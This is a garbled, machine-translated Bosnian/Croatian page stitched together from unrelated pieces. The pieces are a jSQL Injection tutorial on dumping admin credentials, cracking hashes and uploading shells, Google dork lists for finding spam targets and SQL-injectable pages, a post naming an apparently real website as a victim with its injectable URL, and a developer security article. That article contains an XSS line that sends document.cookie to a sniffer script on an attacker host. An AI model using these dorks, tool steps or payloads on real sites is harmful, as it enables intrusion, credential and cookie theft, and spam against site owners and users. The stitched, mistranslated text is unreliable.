Upute za korištenje jSQL Injection, multifunkcionalnog alata za pronalaženje i iskorištavanje SQL injekcija u Kali Linuxu. Upute za korištenje jSQL Injection - multifunkcionalnog alata za pretraživanje i iskorištavanje SQL injekcija u Kali Linuxu

Pokrenite preuzetu datoteku dvostrukim klikom (morate imati virtuelna mašina ).

[Odjeljak u razvoju]

[Odjeljak u razvoju]

[Odjeljak u razvoju]

Rad sa programom je izuzetno jednostavan. Samo unesite adresu web stranice i pritisnite ENTER.

Sljedeći snimak ekrana pokazuje da je stranica ranjiva na tri vrste SQL injekcija (informacije o njima su naznačene u donjem desnom kutu). Klikom na nazive injekcija možete promijeniti korišteni metod:

Također, postojeće baze podataka su nam već prikazane.

Možete pogledati sadržaj svake tabele:

Obično je najzanimljivija stvar u vezi sa tabelama administratorski akreditivi.

Ako imate sreće i nađete podatke administratora, onda je prerano za radovanje. Još uvijek morate pronaći admin panel gdje ćete unijeti ove podatke.

Da biste to učinili, idite na sljedeću karticu. Ovdje nas dočekuje lista mogućih adresa. Možete odabrati jednu ili više stranica za provjeru:

Pogodnost leži u činjenici da ne morate koristiti druge programe.

Nažalost, nema mnogo nemarnih programera koji čuvaju lozinke u čistom tekstu. Vrlo često u redu lozinke vidimo nešto slično

8743b52063cd84097a65d1633f5c74f5

Ovo je heš. Možete ga dešifrirati koristeći grubu silu. I... jSQL Injection ima ugrađeni brute forcer.

Nesumnjiva pogodnost je što ne morate tražiti druge programe. Postoji podrška za mnoge od najpopularnijih hashova.

Ovo nije najviše najbolja opcija. Da biste postali guru u dekodiranju heševa, preporučuje se Knjiga “” na ruskom.

Ali, naravno, kada nema drugog programa pri ruci ili nema vremena za učenje, jSQL Injection sa svojom ugrađenom brute force funkcijom će dobro doći.

Postoje postavke: možete podesiti koji znakovi su uključeni u lozinku, raspon dužine lozinke.

Osim operacija s bazama podataka - čitanje i modificiranje istih, ako se otkriju SQL injekcije, mogu se izvršiti sljedeće operacije sa datotekama:

• čitanje datoteka na serveru
• učitavanje novih fajlova na server
• učitavanje školjki na server

I sve je to implementirano u jSQL Injection!

Postoje ograničenja - SQL server mora imati privilegije datoteka. Oni razumni administratori sistema oni su onemogućeni i imaju pristup sistem datoteka neće moći dobiti.

Prisutnost privilegija datoteka je prilično jednostavno provjeriti. Idite na jednu od kartica (čitanje datoteka, kreiranje ljuske, učitavanje nove datoteke) i pokušajte izvršiti jednu od navedenih operacija.

I dalje veoma važna napomena- moramo znati tačnu apsolutnu putanju do datoteke sa kojom ćemo raditi - inače ništa neće raditi.

Pogledajte sljedeći snimak ekrana:

Na svaki pokušaj rada na fajlu, odgovaramo: Nema privilegija FILE (nema privilegija fajla). I tu se ništa ne može učiniti.

Ako umjesto toga imate drugu grešku:

Problem sa pisanjem u [directory_name]

To znači da ste pogrešno naveli apsolutnu putanju na koju želite da upišete datoteku.

Da biste pogodili apsolutni put, morate barem znati operativni sistem na kojem server radi. Da biste to učinili, prijeđite na karticu Mreža.

Ovaj unos (Win64 linija) daje nam razloga da pretpostavimo da imamo posla sa Windows OS:

Keep-Alive: timeout=5, max=99 Server: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Veza: Keep-Alive Metod: HTTP/1.1 200 OK Dužina sadržaja: 353 Datum: pet, 11. decembar 2015. 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Content-Type: text/html; charset=UTF-8

Ovdje imamo neki Unix (*BSD, Linux):

Transfer-Encoding: chunked Datum: pet, 11. decembar 2015. 11:57:02 GMT Metoda: HTTP/1.1 200 OK Keep-Alive: timeout=3, max=100 Veza: keep-alive Content-Type: text/html X- Powered-By: PHP/5.3.29 Server: Apache/2.2.31 (Unix)

I ovdje imamo CentOS:

Metoda: HTTP/1.1 200 OK Ističe: Čet, 19. novembar 1981. 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ Veza: Keep-alive X-Cache-Lookup: MISS sa t1.hoster.ru:6666 Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS sa t1.hoster.ru Cache-Control: nema skladištenja, nema predmemorije, mora se ponovo potvrditi, post-check=0, pre-check=0 Pragma: nema predmemorije Datum: pet, 11. decembar 2015. 12:08:54 GMT Transfer-Encoding: chunked Content-Type: text/html; charset=WINDOWS-1251

Na Windows-u, tipična fascikla za lokacije je C:\Server\data\htdocs\. Ali, u stvari, ako je neko "smislio" da napravi server na Windows-u, onda, vrlo verovatno, ta osoba nije čula ništa o privilegijama. Stoga, trebali biste početi pokušavati direktno iz C:/Windows/ direktorija:

Kao što vidite, prvi put je sve prošlo kako treba.

Ali same ljuske za jSQL injekciju izazivaju sumnje u mom umu. Ako imate privilegije za fajlove, onda možete lako da otpremite nešto preko web interfejsa.

Čak je i ova funkcija dostupna u jSQL injekciji. Sve je krajnje jednostavno - preuzmite listu stranica (možete uvesti iz datoteke), odaberite one koje želite provjeriti i kliknite na odgovarajuće dugme da započnete operaciju.

jSQL injekcija je dobra, moćan alat za pretraživanje i naknadno korištenje SQL injekcija pronađenih na web stranicama. Njegove nesumnjive prednosti: jednostavnost upotrebe, ugrađen povezane funkcije. jSQL Injection može biti najbolji prijatelj početnika kada analizira web stranice.

Među nedostacima bih istakao nemogućnost uređivanja baza podataka (barem ja nisam pronašao ovu funkcionalnost). Kao i svi instrumenti sa grafički interfejs, jedan od nedostataka ovog programa može se pripisati nemogućnosti njegove upotrebe u skriptama. Ipak, moguća je i određena automatizacija u ovom programu - zahvaljujući ugrađenoj funkciji masovne provjere lokacije.

jSQL Injection program je mnogo praktičniji za korištenje od sqlmap-a. Ali sqlmap podržava više tipova SQL injekcija, ima opcije za rad sa zaštitnim zidovima datoteka i neke druge funkcije.

Zaključak: jSQL Injection - najbolji prijatelj početnik haker.

Pomoć za ovaj program u Kali Linux Enciklopediji možete pronaći na ovoj stranici: http://kali.tools/?p=706

Vjerovatno svi znaju kako se ovo koristi pretraživač, kao Google =) Ali ne znaju svi to ako ga pravilno sastavite upit za pretragu uz pomoć posebnih dizajna možete mnogo efikasnije i brže postići rezultate onoga što tražite =) U ovom članku pokušat ću pokazati šta i kako trebate učiniti da biste pretraživali ispravno

Google podržava nekoliko naprednih operatora pretraživanja koji imaju posebno značenje prilikom pretraživanja na google.com. Tipično, ovi operateri mijenjaju pretragu ili čak govore Googleu da to uradi u potpunosti razne vrste traži. Na primjer, link: construct je poseban operator, a zahtjev link:www.google.com neće vam dati normalnu pretragu, već će umjesto toga pronaći sve web stranice koje imaju veze na google.com.
alternativni tipovi zahtjeva

cache: Ako u upit uključite druge riječi, Google će istaknuti te riječi unutar keširanog dokumenta.
na primjer, cache: www.web stranicaće prikazati keširani sadržaj sa istaknutom riječju "web".

link: Upit za pretragu iznad će prikazati web stranice koje sadrže veze do navedenog upita.
na primjer: link:www.siteće prikazati sve stranice koje imaju link na http://www.site

povezano: Prikazuje web stranice koje su “povezane” sa navedenom web stranicom.
na primjer, povezano: www.google.comće navesti web stranice koje su slične početna stranica Google.

info: Zahtjev za informacije: predstavit će neke od informacija koje Google ima o web stranici koju tražite.
na primjer, info:websiteće pokazati informacije o našem forumu =) (Armada - Forum za odrasle webmastere).

Ostali zahtjevi za informacijama

define: upit define: će dati definiciju riječi koje unesete nakon njega, prikupljene iz različitih izvora na mreži. Definicija će biti za cijelu unesenu frazu (to jest, uključit će sve riječi u tačnom upitu).

dionice: Ako započnete upit s dionicama: Google će obraditi preostale uvjete upita kao simbole dionica i povezati se na stranicu koja prikazuje gotove informacije za ove simbole.
na primjer, dionice: Intel yahooće prikazati informacije o Intelu i Yahoou. (Imajte na umu da biste trebali upisati simbole za najnovije vijesti, a ne naziv kompanije)

Modifikatori upita

site: Ako u svoj upit uključite site:, Google će ograničiti rezultate na one web stranice koje pronađe u toj domeni.
Također možete pretraživati ​​po pojedinačnim zonama, kao što su ru, org, com, itd ( site:com site:ru)

allintitle: Ako pokrenete upit sa allintitle:, Google će ograničiti rezultate na sve riječi upita u naslovu.
na primjer, allintitle: google pretraga će vratiti sve Google stranice pretraživanjem kao što su slike, blog, itd

intitle: Ako u svoj upit uključite intitle:, Google će ograničiti rezultate na dokumente koji sadrže tu riječ u naslovu.
na primjer, naslov: Posao

allinurl: Ako pokrenete upit sa allinurl: Google će ograničiti rezultate na sve riječi upita u URL-u.
na primjer, allinurl: google pretragaće vratiti dokumente sa google i pretražiti u naslovu. Također, kao opciju, možete razdvojiti riječi kosom crtom (/) tada će riječi s obje strane kose crte biti pretraživane na istoj stranici: Primjer allinurl: foo/bar

inurl: Ako uključite inurl: u svoj upit, Google će ograničiti rezultate na dokumente koji sadrže tu riječ u URL-u.
na primjer, Animacija inurl:site

intext: pretražuje samo navedenu riječ u tekstu stranice, zanemarujući tekstove naslova i linkova i druge stvari koje nisu povezane sa ovim modifikatorom - allintext: tj. dalje, sve riječi u upitu će se pretraživati ​​samo u tekstu, što također može biti važno, zanemarujući često korištene riječi u linkovima
na primjer, intext:forum

daterange: pretrage unutar vremenskog okvira (daterange:2452389-2452389), datumi za vremena su u julijanskom formatu.

Pa, i sve vrste zanimljivih primjera upita

Primjeri pisanja upita za Google. Za spamere

Inurl:control.guest?a=sign

Site:books.dreambook.com “URL početne stranice” “Potpiši moj” inurl:sign

Sajt: www.freegb.net Početna stranica

Inurl:sign.asp “Broj znakova”

“Poruka:” inurl:sign.cfm “Pošiljalac:”

Inurl:register.php “Registracija korisnika” “Website”

Inurl:edu/knjiga gostiju “Upišite se u knjigu gostiju”

Inurl:objavite “Objavite komentar” “URL”

Inurl:/archives/ “Komentari:” “Sjećate se informacija?”

“Skriptu i knjigu gostiju Kreirao:” “URL:” “Komentari:”

Inurl:?action=add “phpBook” “URL”

Naslov: "Pošalji novu priču"

Časopisi

Inurl:www.livejournal.com/users/ mode=reply

Inurl greatestjournal.com/ mode=reply

Inurl:fastbb.ru/re.pl?

Inurl:fastbb.ru /re.pl? "Knjiga gostiju"

Blogovi

Inurl:blogger.com/comment.g?”postID””anonymous”

Inurl:typepad.com/ “Objavite komentar” “Zapamtite lične podatke?”

Inurl:greatestjournal.com/community/ “Objavi komentar” “adrese anonimnih postera”

“Ostavite komentar” “adrese anonimnih postera” -

Naslov: "Objavi komentar"

Inurl:pirillo.com “Objavi komentar”

Forumi

Inurl:gate.html?”name=Forumi” “mode=reply”

Inurl:”forum/posting.php?mode=reply”

Inurl:"mes.php?"

Inurl:”members.html”

Inurl:forum/memberlist.php?”

Inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php? id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray- Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl: news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl: select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem. php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php? id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl: prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view. php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php? id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl :downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl :product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail .php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php ?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php ?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl :readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl :aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce .php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php ?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php? ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl: offer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:".php?id=1" inurl:".php?cat=1" inurl:".php?catid= 1" inurl:".php?num=1" inurl:".php?bid=1" inurl:".php?pid=1" inurl:".php?nid=1"

evo male liste. Možete koristiti svoje. I tako, pronašli smo sajt. Na primjer http://www.vestitambov.ru/
Zatim preuzmite ovaj program

Kliknite OK. Zatim ubacujemo mjesto žrtve.
Pritisnemo start. Zatim čekamo rezultate.
I tako, program je pronašao SQL ranjivost.

Zatim preuzmite Havij, http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= tamo zalijepite primljenu vezu. Neću objašnjavati kako koristiti Havij i gdje ga preuzeti nije teško. Sve. Dobili ste podatke koji su vam potrebni - administratorsku lozinku, a onda je na vašoj mašti.

P.S. Ovo je moj prvi pokušaj da nešto napišem. Izvinite ako nešto nije u redu

Odlučio sam da popričamo malo o tome sigurnost informacija. Članak će biti koristan za programere početnike i one koji su tek počeli da se bave razvojem Frontenda. u čemu je problem?

Mnogi programeri početnici se toliko zanose pisanjem koda da potpuno zaborave na sigurnost svog rada. I što je najvažnije, zaboravljaju na takve ranjivosti kao što su SQL i XXS upiti. Oni također smišljaju jednostavne lozinke za svoje administrativne panele i podvrgnuti su gruboj sili. Šta su to napadi i kako ih izbjeći?

SQL injekcija je najčešći tip napada na bazu podataka, koji se izvodi tokom SQL upita za određeni DBMS. Mnogi ljudi, pa čak i velike kompanije pate od takvih napada. Razlog je greška programera pri pisanju baze podataka i, strogo govoreći, SQL upita.

Napad SQL injekcijom je moguć zbog pogrešne obrade ulaznih podataka koji se koriste u SQL upitima. Ako je hakerski napad uspješan, rizikujete da izgubite ne samo sadržaj baza podataka, već i lozinke i evidencije administrativnog panela. I ovi podaci će biti sasvim dovoljni da u potpunosti preuzmete stranicu ili izvršite nepovratna prilagođavanja na njoj.

Napad se može uspješno reprodukovati u skriptama napisanim u PHP, ASP, Perl i drugim jezicima. Uspjeh ovakvih napada više ovisi o tome koji se DBMS koristi i kako se implementira sama skripta. U svijetu postoji mnogo ranjivih lokacija za SQL injekcije. Ovo je lako provjeriti. Samo unesite "dorks" - ovo su posebni upiti za traženje ranjivih stranica. Evo nekih od njih:

• inurl:index.php?id=
• inurl:trainers.php?id=
• inurl:buy.php?category=
• inurl:article.php?ID=
• inurl:play_old.php?id=
• inurl:declaration_more.php?decl_id=
• inurl:pageid=
• inurl:games.php?id=
• inurl:page.php?file=
• inurl:newsDetail.php?id=
• inurl:gallery.php?id=
• inurl:article.php?id=

Kako ih koristiti? Samo ih unesite u Google ili Yandex pretraživač. Pretraživač će vam dati ne samo ranjivu stranicu, već i stranicu o ovoj ranjivosti. Ali nećemo se tu zaustaviti i pobrinuti se da stranica bude zaista ranjiva. Da biste to učinili, dovoljno je staviti iza vrijednosti “id=1” jednostruki navodnik"'". nesto ovako:

• inurl:games.php?id=1’

I stranica će nam dati grešku o SQL upit. Šta dalje treba našem hakeru?

A onda mu treba ovaj link do stranice greške. Zatim se rad na ranjivosti u većini slučajeva odvija u distribuciji "Kali linux" sa svojim uslužnim programima za ovaj dio: uvođenje injekcionog koda i izvođenje potrebnih operacija. Kako će se to dogoditi, ne mogu vam reći. Ali informacije o tome možete pronaći na internetu.

Ova vrsta napada se izvodi na Kolačići. Korisnici, pak, vole da ih spašavaju. Zašto ne? Šta bismo mi bez njih? Uostalom, zahvaljujući kolačićima, ne moramo sto puta unositi lozinku za Vk.com ili Mail.ru. I malo je onih koji ih odbijaju. Ali na internetu se za hakere često pojavljuje pravilo: koeficijent pogodnosti je direktno proporcionalan koeficijentu nesigurnosti.

Za implementaciju XSS napada, našem hakeru je potrebno znanje JavaScripta. Na prvi pogled, jezik je vrlo jednostavan i bezopasan, jer nema pristup kompjuterskim resursima. Haker može raditi samo sa JavaScriptom u pretraživaču, ali to je dovoljno. Uostalom, glavna stvar je unijeti kod na web stranicu.

Neću detaljno govoriti o procesu napada. Reći ću vam samo osnove i značenje kako se to dešava.

Haker može dodati JS kod na neki forum ili knjigu gostiju:

document.location.href =”http://192.168.1.7/sniff.php?test”

Skripte će nas preusmjeriti na zaraženu stranicu, gdje će se izvršiti kod: bilo da se radi o snifferu, nekoj vrsti pohrane ili eksploataciji, koja će na neki način ukrasti naše kolačiće iz keša.

Zašto JavaScript? Jer JavaScript je odličan u rukovanju web zahtjevima i ima pristup kolačićima. Ali ako nas naša skripta odvede na neku stranicu, korisnik će to lako primijetiti. Ovdje haker koristi lukaviju opciju - jednostavno unese kod u sliku.

Img=nova slika();

Img.src=”http://192.168.1.7/sniff.php?”+document.cookie;

Jednostavno kreiramo sliku i dodijelimo joj našu skriptu kao adresu.

Kako se zaštititi od svega ovoga? Vrlo je jednostavno - nemojte klikati na sumnjive veze.

DoS (od engleskog Denial of Service - uskraćivanje usluge) - hakerski napad on kompjuterski sistem kako bi je doveo do neuspjeha. Ovo je stvaranje uslova pod kojima bona fide korisnici sistema ne mogu pristupiti pruženom sistemski resursi(serveri), ili je ovaj pristup otežan. Kvar sistema također može biti korak ka njegovom preuzimanju, ako u hitnoj situaciji softver proizvede bilo kakvu kritičnu informaciju: na primjer, verziju, dio programski kod itd. Ali najčešće je to mjera ekonomskog pritiska: gubitak jednostavne usluge koja stvara prihod. Računi od provajdera ili mjere za izbjegavanje napada značajno pogađaju "metu" u džepu Trenutno su DoS i DDoS napadi najpopularniji, jer omogućavaju da gotovo svaki sistem propadne bez ostavljanja pravno značajnih dokaza.

Koja je razlika između DoS i DDos napada?

DoS je napad osmišljen na pametan način. Na primjer, ako server ne provjerava ispravnost dolaznih paketa, tada haker može uputiti zahtjev koji će trajati zauvijek, a procesoru neće biti dovoljno vremena za rad s drugim konekcijama. Shodno tome, klijenti će biti uskraćeni za uslugu. Ali na ovaj način neće biti moguće preopteretiti ili onemogućiti velike poznate stranice. Naoružani su prilično širokim kanalima i super-moćnim serverima koji se mogu nositi s takvim preopterećenjem bez ikakvih problema.

DDoS je zapravo isti napad kao i DoS. Ali ako u DoS-u postoji jedan paket zahtjeva, onda u DDoS-u može ih biti stotine ili više. Čak i super-moćni serveri možda neće moći da se nose sa takvim preopterećenjem. Dozvolite mi da vam dam primjer.

DoS napad je kada s nekim razgovarate, ali tada priđe neka nevaspitana osoba i počne glasno da viče. Ili je nemoguće ili veoma teško razgovarati. Rješenje: pozvati obezbjeđenje, koje će smiriti i ukloniti osobu iz prostorije. DDoS napadi su kada gomila hiljada takvih nevaspitanih ljudi uleti. U tom slučaju obezbjeđenje neće moći sve vezati i odvesti.

DoS i DDoS se izvode iz kompjutera, takozvani zombiji. Riječ je o kompjuterima korisnika koje su hakirali hakeri koji ni ne sumnjaju da njihova mašina učestvuje u napadu na bilo koji server.

Kako se zaštititi od ovoga? Općenito, nema šanse. Ali možete otežati stvari hakeru. Da biste to učinili potrebno je da odaberete dobar hosting sa moćnim serverima.

Programer može smisliti mnogo sistema za zaštitu od napada, u potpunosti pregledati skripte koje smo napisali, provjeriti web lokaciju na ranjivosti itd. Ali kada je u pitanju poslednji korak izgled stranice, naime kada jednostavno stavi lozinku na admin panel, može zaboraviti na jednu stvar. Lozinka!

Strogo se ne preporučuje postavljanje jednostavne lozinke. To može biti 12345, 1114457, vasya111, itd. Ne preporučuje se postavljanje lozinki kraće od 10-11 znakova. U suprotnom, možete biti izloženi najčešćem i nekomplikovanom napadu - Brute force.

Brute force je napad pomoću lozinke rječnika specijalni programi. Rječnici mogu biti različiti: latinski, nabrajanje po brojevima, recimo do određenog raspona, mješoviti (latinica + brojevi), a postoje čak i rječnici sa jedinstvenim znakovima @#4$%&*~~`’”\ ? itd.

Naravno, ovu vrstu napada je lako izbjeći. Samo smislite složenu lozinku. Čak vas i captcha može spasiti. Također, ako je vaša stranica napravljena na CMS-u, onda mnogi od njih otkrivaju ovu vrstu napada i blokiraju IP. Uvijek morate zapamtiti da što je više različitih znakova u lozinki, to je teže pogoditi.

Kako rade hakeri? U većini slučajeva oni ili sumnjaju ili znaju dio lozinke unaprijed. Sasvim je logično pretpostaviti da se korisnička lozinka sigurno neće sastojati od 3 ili 5 karaktera. Takve lozinke dovode do čestog hakovanja. U osnovi, hakeri uzimaju raspon od 5 do 10 znakova i dodaju nekoliko znakova koje možda znaju unaprijed. Zatim se generiraju lozinke sa potrebnim rasponima. Kali Linux distribucija čak ima programe za takve slučajeve. I voila, napad više neće dugo trajati, jer obim rječnika više nije tako velik. Osim toga, haker može koristiti snagu video kartice. Neki od njih podržavaju CUDA sistem, a brzina pretraživanja se povećava i do 10 puta. I sada vidimo da je napad ovakav na jednostavan način sasvim realno. Ali nisu samo web stranice podložne gruboj sili.

Dragi programeri, nikada ne zaboravite na sistem sigurnosti informacija, jer danas mnogi ljudi, uključujući i države, pate od takvih vrsta napada. Uostalom, najveća ranjivost je osoba koja uvijek može negdje skrenuti pažnju ili nešto propustiti. Mi smo programeri, ali nismo programirane mašine. Uvijek budite na oprezu, jer gubitak informacija može imati ozbiljne posljedice!